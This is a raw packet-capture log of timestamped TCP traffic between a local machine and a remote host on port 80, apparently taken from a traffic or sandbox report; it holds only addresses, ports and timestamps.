                                                              Oct 30, 2024 15:44:45.287136078 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.287166119 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.287183046 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.287189960 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.287234068 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.290159941 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.290182114 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.290229082 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.292413950 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.292435884 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.292480946 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.295401096 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.295423031 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.295479059 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.297703981 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.297715902 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.297765970 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.300652027 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.300664902 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.300677061 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.300714970 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.302969933 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.302983046 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.303016901 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.305903912 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.305931091 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.305963993 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.308232069 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.308245897 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.308279991 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.311192989 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.311207056 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.311218977 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.311247110 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.311261892 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.313508034 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.313522100 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.313569069 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.316452026 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.316467047 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.316514969 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.318759918 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.318773031 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.318820953 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.321758032 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.321772099 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.321813107 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.324007988 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.324021101 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.324032068 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.324178934 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.327001095 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.327022076 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.327045918 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.329266071 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.329287052 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.329315901 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.332281113 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.332302094 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.332324982 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.334546089 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.334577084 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.334594011 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.334597111 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.334636927 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.337599039 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.337622881 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.337661028 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.339773893 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.339796066 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.339843988 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.342861891 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.342884064 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.342945099 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.345072985 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.345096111 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.345156908 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.348093033 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.348115921 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.348135948 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.348160028 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.350336075 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.350358009 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.350394011 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.353364944 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.353385925 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.353415966 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.355622053 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.355643988 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.355668068 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.358606100 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.358627081 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.358647108 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.358670950 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.358694077 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.360928059 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.360950947 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.361010075 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.363918066 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.363940001 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.363987923 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.366209984 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.366233110 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.366281033 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.369224072 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.369245052 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.369291067 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.371471882 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.371495008 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.371515036 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.371535063 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.374512911 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.374535084 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.374572992 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.376763105 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.376794100 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.376832008 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.379792929 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.379828930 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.379847050 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.382108927 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.382145882 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.382158041 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.382179976 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.382221937 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.385056973 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.385092974 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.385159969 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.387433052 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.387470007 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.387516975 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.390297890 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.390311003 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.390355110 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.392663956 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.392676115 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.392729044 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.395584106 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.395602942 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.395613909 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.395656109 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.397897959 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.397911072 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.397949934 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.400813103 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.400825977 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.400870085 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.403194904 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.403208017 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.403244972 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.406075954 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.406090021 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.406099081 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.406126976 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.406155109 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.408453941 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.408467054 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.408508062 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.411307096 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.411324978 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.411381006 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.413741112 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.413753986 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.413794994 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.416549921 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.416563034 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.416623116 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.418970108 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.418982983 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.418994904 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.419029951 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.421804905 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.421819925 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.421870947 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.424231052 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.424243927 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.424274921 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.427042961 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.427056074 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.427105904 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.429482937 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.429497004 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.429507971 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.429543018 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.429560900 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.432315111 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.432328939 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.432369947 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.434743881 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.434756994 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.434808016 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.437586069 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.437598944 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.437640905 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.440000057 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.440013885 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.440047979 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.442986012 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.442998886 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.443031073 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.806679964 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.806715965 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.806737900 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.806757927 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.806777000 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.806788921 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.806802034 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.806799889 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.806843042 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.806866884 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.806878090 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.806889057 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.806899071 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.806906939 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.806915045 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.806931973 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.806931973 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.806946039 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.806956053 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.806957006 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.806963921 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.806973934 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.806986094 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.806998014 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.807001114 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.807024002 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.807636976 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.807655096 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.807686090 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.808794022 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.808836937 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.808865070 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.810264111 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.810312033 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.810333014 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.812138081 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.812189102 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.812206030 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.813915968 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.813961029 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.813978910 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.815690041 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.815737009 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.815788984 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.817543983 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.817588091 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.817595005 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.819371939 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.819411039 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.819444895 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.821178913 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.821191072 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.821227074 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.823081970 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.823128939 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.823148012 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.824892044 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.824934006 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.824938059 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.826716900 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.826761007 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.826769114 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.828455925 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.828474045 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.828497887 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.829853058 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.829896927 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.829910040 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.831242085 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.831285000 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.831321955 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.832737923 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.832781076 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.832782984 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.834048986 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.834089994 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.834116936 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.835460901 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.835499048 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.835530996 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.836848021 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.836891890 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.836903095 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.838248968 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.838259935 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.838298082 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.839637041 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.839648008 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.839692116 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.841008902 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.841049910 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.841125011 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.842384100 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.842428923 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.842459917 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.843789101 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.843827009 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.843835115 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.844964027 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.844983101 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.845005989 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.846142054 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.846184969 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.846204042 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.847301006 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.847342968 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.847376108 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.848332882 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.848376989 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.848406076 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.849392891 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.849436045 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.849455118 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.850409985 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.850450039 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.850524902 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.851459026 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.851502895 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.851510048 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.852513075 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.852530956 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.852552891 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.853559971 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.853601933 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.853614092 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.854615927 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.854626894 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.854659081 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.855659008 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.855671883 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.855705976 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.856770992 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.856813908 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.856837988 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.857779026 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.857819080 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.857846022 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.858721018 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.858766079 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.858768940 CET4999580192.168.2.6147.45.47.81
